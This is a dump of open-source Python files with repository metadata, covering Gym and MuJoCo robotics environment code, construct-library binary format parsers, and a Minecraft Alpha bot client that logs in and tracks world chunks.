entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'z'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateBlockRotateParallel{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'parallel'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateBlockRotateXYZ{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateBlockFull{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n # Alias for \"Full\"\n register(\n id='VisualHandManipulateBlock{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateEggRotate{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandEggEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateEggFull{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandEggEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n # Alias for \"Full\"\n register(\n id='VisualHandManipulateEgg{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandEggEnv',\n kwargs=_merge({'target_position': 
'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulatePenRotate{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandPenEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulatePenFull{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandPenEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n # Alias for \"Full\"\n register(\n id='VisualHandManipulatePen{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandPenEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n"
},
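Each register() call above assembles its kwargs through _merge, which mutates and returns its first argument. That is safe in this file only because every call site passes a fresh dict literal as a, so the shared kwargs dict arrives as b and is only ever read. A small demonstration of that subtlety:

def _merge(a, b):
    a.update(b)
    return a

shared = {'reward_type': 'sparse'}
first = _merge({'target_rotation': 'z'}, shared)
second = _merge({'target_rotation': 'xyz'}, shared)
print(first)   # {'target_rotation': 'z', 'reward_type': 'sparse'}
print(second)  # {'target_rotation': 'xyz', 'reward_type': 'sparse'}
print(shared)  # {'reward_type': 'sparse'} -- untouched, it was only read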
{
"alpha_fraction": 0.5377697944641113,
"alphanum_fraction": 0.5755395889282227,
"avg_line_length": 24.31818199157715,
"blob_id": "2593607e96660221afd13d6c706654c46a3d4b1c",
"content_id": "42beea2907041b37c17cb435f206e17b5346229e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 22,
"path": "/baselines_hrl/test/square2d_test.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018\nimport gym\nimport envs\nimport scipy.misc\n\nfrom envs.square2d import Square2dEnv\nimport time\nimport numpy as np\nif __name__ == '__main__':\n test_env = 'Square2dSimple-v0'\n # env = gym.make(test_env)\n env = Square2dEnv(horizon=1000)\n for i in range(5):\n env.reset()\n done = False\n time_count = 0\n while not done:\n time_count += 1\n action = env.action_space.sample()\n obs, reward, done, _ = env.step(action)\n env.render()\n time.sleep(3)"
},
{
"alpha_fraction": 0.5879999995231628,
"alphanum_fraction": 0.6039999723434448,
"avg_line_length": 30.93617057800293,
"blob_id": "35363675a4f1a9b8def33a71beca182bd87cb2b4",
"content_id": "b10fa350c1eb5419c110bc3fe06c2d527a88e9c6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1500,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 47,
"path": "/baselines_hrl/envs/square2d/square2d_visual_simple_env.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from mujoco_py import load_model_from_path, MjSim, MjViewer\nfrom gym import spaces\nfrom gym import Env, GoalEnv\nfrom gym.utils import seeding\nimport os\nimport numpy as np\nfrom numpy.random import random\nfrom os import path\nfrom envs.square2d.square2d_visual_env import Square2dVisualEnv\n\n\nclass Square2dVisualSimpleEnv(Square2dVisualEnv):\n def __init__(self, *args, **kwargs):\n super(Square2dVisualSimpleEnv, self).__init__(*args, **kwargs)\n if 'horizon' not in kwargs:\n self.horizon = 100\n\n ''' \n def reset(self):\n self.set_ball_location([0., 0.])\n self.set_goal_location(self._sample_goal())\n self.sim.forward()\n self.time_step = 0\n return self.get_current_observation()\n '''\n def step(self, ctrl):\n ctrl = np.clip(ctrl, -1., 1.)\n ctrl = ctrl/100\n ballPos = self.get_ball_location()\n self.set_ball_location(np.asarray(ballPos) + np.asarray(ctrl))\n self.sim.forward()\n self.take_step()\n obs = self.get_current_observation()\n info = {\n 'is_success': self._is_success(obs['achieved_goal'], obs['desired_goal']),\n }\n reward = self.compute_reward(obs['achieved_goal'], obs['desired_goal'], {})\n done = (reward == 1.0)\n self.time_step += 1\n if self.time_step >= self.horizon:\n done = True\n return obs, reward, done, info\n\n\n @staticmethod\n def _sample_goal():\n return (random((2,)) - 0.5)/3"
}
] | 15 |
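Square2dVisualSimpleEnv's step in the record above sidesteps the physics: the action is clipped to [-1, 1], scaled down by 100, and added directly to the ball position before the simulator is re-synced. That displacement-control rule in isolation — displacement_step is an illustrative helper, not repo code:

import numpy as np

def displacement_step(ball_pos, action, scale=0.01):
    # Mirrors ctrl = np.clip(ctrl, -1., 1.) / 100 followed by a position write.
    action = np.clip(np.asarray(action, dtype=float), -1.0, 1.0)
    return np.asarray(ball_pos, dtype=float) + scale * action

pos = np.zeros(2)
for _ in range(10):
    pos = displacement_step(pos, [1.0, 0.5])
print(pos)   # [0.1  0.05]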
cbroughton/Crafti | https://github.com/cbroughton/Crafti | 905c448cd8fc2c19f1187c177e2815ed8be2f8f7 | 6d9781234161ea1ebb39c57622a4f9275109e59f | 1f5e47c837063da1c513b518d49a6d9867ec3d3b | refs/heads/master | 2020-05-17T00:31:56.272552 | 2011-01-13T03:59:43 | 2011-01-13T03:59:43 | 1,234,677 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6744186282157898,
"alphanum_fraction": 0.7325581312179565,
"avg_line_length": 20.5,
"blob_id": "cab854dff91ce8d39c8a760ded3c949f8a4750c0",
"content_id": "85ab4ffa998adbfcff2359e2e740bf95e2f8204f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 86,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 4,
"path": "/construct/formats/filesystem/ntfs5.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nNT File System (NTFS) version 5\nUsed for MSWindows systems since Windows 2000\n\"\"\"\n"
},
{
"alpha_fraction": 0.7200000286102295,
"alphanum_fraction": 0.7333333492279053,
"avg_line_length": 24,
"blob_id": "8b6ccb0b51eb8874eb079fcb5c14cbd865794a53",
"content_id": "4a7db467a6c96c12a137f22556dfc6d13f33eb65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 3,
"path": "/construct/protocols/layer3/icmpv6.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nInternet Control Message Protocol for IPv6 (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 10,
"blob_id": "0f0d20b3ebb7684cf62d87927eed426a931a9813",
"content_id": "48c2d48d49d712ac0659f47625dd95cbfc24006e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/construct/formats/document/doc.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMicrosoft Word Document \n\"\"\"\n"
},
{
"alpha_fraction": 0.7307692170143127,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 25,
"blob_id": "b70276290f3dfc28375267814e4089fa1e3fdd30",
"content_id": "888b72e0bff3f5b76ecde2188f2b64579db65974",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 3,
"path": "/construct/protocols/layer4/sctp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStream Control Transmission Protocol (SS7 and TCP/IP protocol stacks)\n\"\"\"\n"
},
{
"alpha_fraction": 0.8055555820465088,
"alphanum_fraction": 0.8055555820465088,
"avg_line_length": 44.85714340209961,
"blob_id": "d1994cbbdc544600dc9e68c5df8bfd9537f22695",
"content_id": "322e111a83ef629acb499f72a8604529b3140672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 7,
"path": "/construct/lib/__init__.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "from binary import int_to_bin, bin_to_int, swap_bytes, encode_bin, decode_bin\nfrom bitstream import BitStreamReader, BitStreamWriter\nfrom container import (Container, AttrDict, FlagsContainer, \n ListContainer, LazyContainer)\nfrom hex import HexString, hexdump\nfrom utils import Packer, StringIO\nfrom path import drill\n\n\n\n"
},
{
"alpha_fraction": 0.7313432693481445,
"alphanum_fraction": 0.7313432693481445,
"avg_line_length": 21.33333396911621,
"blob_id": "b3d3d42693d41b9124b897189e262c9cd82a922a",
"content_id": "1df058af6a9a9f7c3e6f75d82c433c8e797669cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 67,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 3,
"path": "/construct/protocols/application/snmp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSimple Network Management Protocol (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.4781649708747864,
"alphanum_fraction": 0.5747684240341187,
"avg_line_length": 25.081396102905273,
"blob_id": "6d99867a63df9ad6252a11704bf1c2931d6eb8c6",
"content_id": "a1edcdf95e935076617a11f449e7ac68ccc9476a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2267,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 86,
"path": "/construct/formats/graphics/wmf.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWindows Meta File\n\"\"\"\nfrom construct import *\n\n\nwmf_record = Struct(\"records\",\n ULInt32(\"size\"), # size in words, including the size, function and params\n Enum(ULInt16(\"function\"),\n Arc = 0x0817,\n Chord = 0x0830,\n Ellipse = 0x0418,\n ExcludeClipRect = 0x0415,\n FloodFill = 0x0419,\n IntersectClipRect = 0x0416,\n LineTo = 0x0213,\n MoveTo = 0x0214,\n OffsetClipRgn = 0x0220,\n OffsetViewportOrg = 0x0211,\n OffsetWindowOrg = 0x020F,\n PatBlt = 0x061D,\n Pie = 0x081A,\n RealizePalette = 0x0035,\n Rectangle = 0x041B,\n ResizePalette = 0x0139,\n RestoreDC = 0x0127,\n RoundRect = 0x061C,\n SaveDC = 0x001E,\n ScaleViewportExt = 0x0412,\n ScaleWindowExt = 0x0400,\n SetBkColor = 0x0201,\n SetBkMode = 0x0102,\n SetMapMode = 0x0103,\n SetMapperFlags = 0x0231,\n SetPixel = 0x041F,\n SetPolyFillMode = 0x0106,\n SetROP2 = 0x0104,\n SetStretchBltMode = 0x0107,\n SetTextAlign = 0x012E,\n SetTextCharacterExtra = 0x0108,\n SetTextColor = 0x0209,\n SetTextJustification = 0x020A,\n SetViewportExt = 0x020E,\n SetViewportOrg = 0x020D,\n SetWindowExt = 0x020C,\n SetWindowOrg = 0x020B,\n _default_ = Pass,\n ),\n Array(lambda ctx: ctx.size - 3, ULInt16(\"params\")),\n)\n\nwmf_placeable_header = Struct(\"placeable_header\",\n Const(ULInt32(\"key\"), 0x9AC6CDD7),\n ULInt16(\"handle\"),\n SLInt16(\"left\"),\n SLInt16(\"top\"),\n SLInt16(\"right\"),\n SLInt16(\"bottom\"),\n ULInt16(\"units_per_inch\"),\n Padding(4),\n ULInt16(\"checksum\")\n)\n\nwmf_file = Struct(\"wmf_file\",\n # --- optional placeable header ---\n Optional(wmf_placeable_header),\n \n # --- header ---\n Enum(ULInt16(\"type\"),\n InMemory = 0,\n File = 1,\n ),\n Const(ULInt16(\"header_size\"), 9),\n ULInt16(\"version\"),\n ULInt32(\"size\"), # file size is in words\n ULInt16(\"number_of_objects\"),\n ULInt32(\"size_of_largest_record\"),\n ULInt16(\"number_of_params\"),\n \n # --- records ---\n GreedyRange(wmf_record)\n)\n\nif __name__ == \"__main__\":\n obj = wmf_file.parse_stream(open(\"../../test/wmf1.wmf\", \"rb\"))\n print obj\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
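The wmf_placeable_header declared above is a fixed 22-byte little-endian layout, so it can be round-tripped with the standard struct module as a cross-check. The 0x9AC6CDD7 magic comes from the record; every other field value below is made up:

import struct

# key(u32) handle(u16) left/top/right/bottom(s16 x4) units_per_inch(u16)
# 4 padding bytes, checksum(u16) -- 22 bytes, little-endian throughout.
FMT = '<IH4hH4xH'
assert struct.calcsize(FMT) == 22

raw = struct.pack(FMT, 0x9AC6CDD7, 0, -10, -10, 500, 300, 1440, 0xABCD)
key, handle, left, top, right, bottom, units, checksum = struct.unpack(FMT, raw)
assert key == 0x9AC6CDD7                 # the placeable-WMF magic checked by Const(...)
print(left, top, right, bottom, units)   # -10 -10 500 300 1440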
{
"alpha_fraction": 0.2684377431869507,
"alphanum_fraction": 0.34099921584129333,
"avg_line_length": 18.238462448120117,
"blob_id": "eb7e8a33ddcc9b46b9ab53e4046746c88e162c65",
"content_id": "4f41ea5684ab86fd61d7996c87240bddddb49bed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2522,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 130,
"path": "/construct/lib/path.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "from container import Container\n\n\ndef drill(obj, root = \"\", levels = -1):\n if levels == 0:\n yield root, obj\n return\n levels -= 1\n if isinstance(obj, Container):\n for k, v in obj:\n r = \"%s.%s\" % (root, k)\n if levels:\n for r2, v2 in drill(v, r, levels):\n yield r2, v2\n else:\n yield r, v\n elif isinstance(obj, list):\n for i, item in enumerate(obj):\n r = \"%s[%d]\" % (root, i)\n if levels:\n for r2, v2 in drill(item, r, levels):\n yield r2, v2\n else:\n yield r, item\n else:\n yield root, obj\n\n\nif __name__ == \"__main__\":\n from construct import *\n \n c = Struct(\"foo\",\n Byte(\"a\"),\n Struct(\"b\",\n Byte(\"c\"),\n UBInt16(\"d\"),\n ),\n Byte(\"e\"),\n Array(4,\n Struct(\"f\", \n Byte(\"x\"),\n Byte(\"y\"),\n ),\n ),\n Byte(\"g\"),\n )\n o = c.parse(\"acddexyxyxyxyg\")\n \n for lvl in range(4):\n for path, value in drill(o, levels = lvl):\n print path, value\n print \"---\"\n \n output = \"\"\" \n Container:\n a = 97\n b = Container:\n c = 99\n d = 25700\n e = 101\n f = [\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n ]\n g = 103\n ---\n .a 97\n .b Container:\n c = 99\n d = 25700\n .e 101\n .f [\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n ]\n .g 103\n ---\n .a 97\n .b.c 99\n .b.d 25700\n .e 101\n .f[0] Container:\n x = 120\n y = 121\n .f[1] Container:\n x = 120\n y = 121\n .f[2] Container:\n x = 120\n y = 121\n .f[3] Container:\n x = 120\n y = 121\n .g 103\n ---\n .a 97\n .b.c 99\n .b.d 25700\n .e 101\n .f[0].x 120\n .f[0].y 121\n .f[1].x 120\n .f[1].y 121\n .f[2].x 120\n .f[2].y 121\n .f[3].x 120\n .f[3].y 121\n .g 103\n ---\n \"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
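drill() above walks a nested Container/list tree and yields (path, value) pairs down to a depth cap. The same idea over plain dicts and lists, runnable without construct — dict stands in for Container here, and the path syntax follows the record's test output:

def drill(obj, root='', levels=-1):
    # levels == -1 walks the whole tree, matching the record's default.
    if levels == 0:
        yield root, obj
        return
    levels -= 1
    if isinstance(obj, dict):
        for k, v in obj.items():
            yield from drill(v, '%s.%s' % (root, k), levels)
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            yield from drill(item, '%s[%d]' % (root, i), levels)
    else:
        yield root, obj

tree = {'a': 97, 'b': {'c': 99, 'd': 25700}, 'f': [{'x': 120}, {'y': 121}]}
for path, value in drill(tree, levels=2):
    print(path, value)   # .a 97 / .b.c 99 / .b.d 25700 / .f[0] {'x': 120} ...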
{
"alpha_fraction": 0.695652186870575,
"alphanum_fraction": 0.72826087474823,
"avg_line_length": 22,
"blob_id": "6870f563308ea69564303a11d15a9ad80b1805ed",
"content_id": "8c5d370ab78decf9d091240d67c931a2029185b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 4,
"path": "/construct/formats/filesystem/ext3.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExtension 3 (ext3)\nUsed primarily for concurrent Linux systems (ext2 + journalling)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6190476417541504,
"avg_line_length": 13,
"blob_id": "ae31b4eb8228211c3dce324e72f03bc12ba84976",
"content_id": "74c006ec7134cab692dfec33ab2a27f5d1a13d89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 3,
"path": "/construct/protocols/application/xwindows.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nX-Windows (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 8.333333015441895,
"blob_id": "b99a8abf3b253bff29c00ca55d7b63e7829e91ee",
"content_id": "7d0bffffe761f8c6190b566e025777353c6688f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 3,
"path": "/construct/formats/document/postscript.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nPostscript document\n\"\"\"\n"
},
{
"alpha_fraction": 0.5079245567321777,
"alphanum_fraction": 0.5192452669143677,
"avg_line_length": 34.890953063964844,
"blob_id": "2cc9da3e354023ae4599cee6cf97c2909532bf24",
"content_id": "aa169df3927ac0088cd5ec64b5c0778caa031d57",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15900,
"license_type": "no_license",
"max_line_length": 193,
"num_lines": 431,
"path": "/SMP.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "# -*- coding: cp1252 -*-\r\nfrom twisted.internet.protocol import Protocol\r\nfrom twisted.internet.protocol import ClientFactory\r\nfrom twisted.internet import reactor\r\nfrom twisted.internet import task\r\nfrom twisted.internet import tksupport\r\n\r\nfrom numpy import zeros\r\nfrom numpy import uint8\r\n\r\nfrom Tkinter import *\r\n\r\n#import os\r\n#import sys\r\n#sys.path.append(os.path.abspath(os.path.dirname(sys.executable)))\r\n\r\n# Bravo Libraries (~dab755a0b118b5125e4b)\r\nfrom packets import make_packet\r\nfrom packets import parse_packets\r\n\r\nimport mechanize\r\n\r\ntry:\r\n conf = open(\"crafti.config\").read().splitlines()\r\n username = conf[0].strip() # Username that owns Minecraft Alpha\r\n password = conf[1].strip() # Password for the above account\r\n version = conf[2].strip() # Version reported to minecraft.net\r\n\r\n automatic = conf[3].strip() # Connect, execute rules, leave.\r\n silent = conf[4].strip() # Never speak, unless \"SAY\" used.\r\n\r\n server = conf[5].strip() # Server (IP:PORT) last connected...\r\n print (\"INFO: crafti.config loaded!\")\r\nexcept:\r\n print (\"WARN: crafti.config not loaded!\")\r\n print (\"INFO: Prompting for settings...\")\r\n username = raw_input(\"\\tMinecraft Username: \").strip()\r\n password = raw_input(\"\\tMinecraft Password: \").strip()\r\n version = \"12\"\r\n automatic = \"no\"\r\n silent = \"no\"\r\n server = \"\"\r\nfinally:\r\n print (\"\\nConfiguration for Run:\")\r\n print (\"\\tUsername: %s\"%username)\r\n print (\"\\tPassword: %s\"%password)\r\n print (\"\\tVersion: %s\"%version)\r\n print (\"\\tAutomated: %s\"%automatic)\r\n print (\"\\tSilent: %s\"%silent)\r\n#End of try, catch, finally\r\n\r\nprint (\"\\n\\nINFO: Attempting to login to minecraft.net ...\")\r\nlogin = mechanize.Browser()\r\nloginResult = login.open(\"http://www.minecraft.net/game/getversion.jsp?user=%s&password=%s&version=%s\"%(username,password,version)).read()\r\n\r\n# Get the values from the response, hopefully.\r\nprint (\"DEBUG: Parsing loginResult...\")\r\ntry:\r\n loggedIn = False\r\n if \"Bad\" in loginResult:\r\n print (\"CRIT: minecraft.net says: %s. Please try again.\"%loginResult)\r\n elif \"Error\" in loginResult:\r\n print (\"CRIT: minecraft.net says: %s. This normally indicates a fatal error, OH NO!\"%loginResult)\r\n elif \"Old\" in loginResult:\r\n print (\"CRIT: minecraft.net says: &s. This means CharlesBroughton has not yet updated Crafti since Minecraft was last updated. 
Please wait for an update to be released.\"%loginResult)\r\n else:\r\n print (\"DEBUG: Extracting variables from loginResult...\")\r\n loginResult = loginResult.split(\":\")\r\n cl_version = loginResult[0]\r\n dl_ticket = loginResult[1]\r\n username = loginResult[2]\r\n session_id = loginResult[3]\r\n loggedIn = True\r\n #End of if, elif, else\r\nexcept:\r\n print (\"ERROR: Unable to parse login response, invalid login perhaps?\")\r\n#End of try, except\r\n\r\nif loggedIn:\r\n print (\"DEBUG: cl_version = %s\"%cl_version)\r\n print (\"DEBUG: dl_ticket = %s\"%dl_ticket)\r\n print (\"INFO: Logged in as: %s\"%username)\r\n print (\"DEBUG: session_id = %s\"%session_id)\r\n\r\n print (\"\\n-------------------------------------\\n\")\r\n raw = raw_input(\"Connect to [%s]: \"%server)\r\n if not raw.strip() == \"\":\r\n server = raw.strip()\r\n #End of if\r\n \r\n #SAVE CONFIG\r\n try:\r\n f = open(\"crafti.config\", \"w\")\r\n f.write(\"%s\\n%s\\n%s\\n%s\\n%s\\n%s\"%(username, password, version, automatic, silent, server))\r\n f.close()\r\n except:\r\n print (\"ERROR: Unable to save to crafti.config. Please make sure the file exists, and is writable.\")\r\n #End of try, except\r\n \r\n try:\r\n connect = server.split(\":\")\r\n server = connect[0]\r\n port = connect[1]\r\n except:\r\n port = 25565\r\n #End of try, except\r\n#End of if\r\n\r\nclass Chunk():\r\n def __init__(self, x, z):\r\n self.x = int(x)\r\n self.z = int(z)\r\n\r\n self.blocks = zeros((16, 16, 128), dtype=uint8)\r\n #End of __init__\r\n\r\n def __repr__(self):\r\n return \"Chunk(%d, %d)\" % (self.x, self.z)\r\n #End of __repr__\r\n\r\n __str__ = __repr__\r\n\r\n def load_from_packet(self, packet):\r\n print (\"PACKET: \", packet)\r\n \r\n# array = [chr(i) for i in self.blocks.ravel()]\r\n# array += pack_nibbles(self.metadata)\r\n# array += pack_nibbles(self.skylight)\r\n# array += pack_nibbles(self.blocklight)\r\n# packet = make_packet(\"chunk\", x=self.x * 16, y=0, z=self.z * 16,\r\n# x_size=15, y_size=127, z_size=15, data=\"\".join(array))\r\n# return packet\r\n\r\n def get_block(self, coords):\r\n x, y, z = coords\r\n\r\n return self.blocks[x, z, y]\r\n #End of get_block\r\n\r\n def set_block(self, coords, block):\r\n x, y, z = coords\r\n\r\n if self.blocks[x, z, y] != block:\r\n self.blocks[x, z, y] = block\r\n\r\n for y in range(127, -1, -1):\r\n if self.blocks[x, z, y]:\r\n break\r\n #End of if\r\n #End of for y\r\n #End of if\r\n #End of set_block\r\n \r\nclass MinecraftBot:\r\n def __init__(self, stats):\r\n self.chunk_cache = {}\r\n self.stats = stats\r\n self.counter = 0\r\n #End of __init__\r\n\r\n def init_chunk(self, x, z):\r\n self.chunk_cache[x, z] = Chunk(x, z)\r\n #End of init_chunk\r\n \r\n def nextLoc(self):\r\n pass\r\n #self.location.position.x += 5\r\n #self.protocol.send(make_packet(\"position\", self.location))\r\n #End of nextLoc\r\n \r\n def onPing(self, payload):\r\n self.protocol.send(make_packet(\"ping\"))\r\n #self.counter += 1\r\n #\r\n #if self.counter > 15:\r\n # self.nextLoc()\r\n # self.counter = 13\r\n #End of onPing\r\n \r\n def onHandshake(self, payload):\r\n print (\"DEBUG: Received Handshake packet.\")\r\n print (\"INFO: Asking minecraft.net to join...\")\r\n login = mechanize.Browser()\r\n url = \"http://www.minecraft.net/game/joinserver.jsp?user=\"\r\n url+= username + \"&sessionId=\" + session_id\r\n url+= \"&serverId=\" + payload.username\r\n login.open(url)\r\n \r\n print (\"DEBUG: Sending Login Response packet.\")\r\n self.protocol.send(make_packet(\"login\", {\"protocol\": 8,\r\n 
\"username\": username,\r\n \"unused\": \"Password\",\r\n \"seed\": 0,\r\n \"dimension\": 0}))\r\n #End of onHandshake\r\n\r\n def onChat(self, payload):\r\n print(\"INFO: Received chat message: %s\"%payload)\r\n #End of onChat\r\n \r\n def onIGNORED(self, payload):\r\n pass\r\n #End of onIGNORED\r\n\r\n def onSpawn(self, payload):\r\n pass\r\n #End of onSpawn\r\n \r\n def onLocation(self, payload):\r\n pass # DEBUGGING\r\n #payload.position.y, payload.position.stance = payload.position.stance, payload.position.y\r\n \r\n #self.location = payload\r\n #self.protocol.send(make_packet(\"location\", self.location))\r\n #End of onLocation\r\n\r\n def onPreChunk(self, payload):\r\n self.init_chunk(payload.x, payload.z)\r\n #End of onPreChunk\r\n \r\n def onBlockUpdate(self, payload):\r\n if (\"blocks_received\") not in self.stats:\r\n self.stats['blocks_received'] = 0\r\n self.stats['blocks_received'] += 1\r\n x = payload.x\r\n y = payload.y\r\n z = payload.z\r\n block = payload.type\r\n xChunk, localX = divmod(x, 16)\r\n zChunk, localZ = divmod(z, 16)\r\n if (xChunk, zChunk) not in self.chunk_cache:\r\n self.init_chunk(xChunk, zChunk)\r\n self.chunk_cache[xChunk, zChunk].set_block({0: localX,1: y,2: localZ}, block)\r\n #End of onBlockUpdate\r\n \r\n def onLargeUpdate(self, payload):\r\n size = (payload.x_size + 1) * (payload.y_size + 1) * (payload.z_size + 1)\r\n blocks = payload.data[:size]\r\n \r\n x, y, z, pointer = payload.x, payload.y, payload.z, 0\r\n while x < payload.x + payload.x_size + 1:\r\n x += 1\r\n xChunk, localX = divmod(x, 16)\r\n while z < payload.z + payload.z_size + 1:\r\n z += 1\r\n zChunk, localZ = divmod(z, 16)\r\n if (xChunk, zChunk) not in self.chunk_cache:\r\n self.init_chunk(xChunk, zChunk)\r\n while y < payload.y + payload.y_size + 1:\r\n y += 1\r\n if (\"blocks_received\") not in self.stats:\r\n self.stats['blocks_received'] = 0\r\n self.stats['blocks_received'] += 1\r\n block = blocks[pointer][0]\r\n block = struct.unpack('B', block)\r\n block = int(block[0])\r\n #if block == 14:\r\n # print (\"== GOLDORE FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 15:\r\n # print (\"== IRONORE FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 16:\r\n # print (\"== COALORE FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 46:\r\n # print (\"== --TNT-- FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 52:\r\n # print (\"== SPAWNER FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 54:\r\n # print (\"== -CHEST- FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 56:\r\n # print (\"== DIAMOND FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n #if block == 73 or block == 74:\r\n # print (\"== REDSTON FOUND == X: %d, Y: %d, Z: %d\"%(x, y, z))\r\n self.chunk_cache[xChunk, zChunk].set_block({0: localX, 1: y, 2: localZ}, 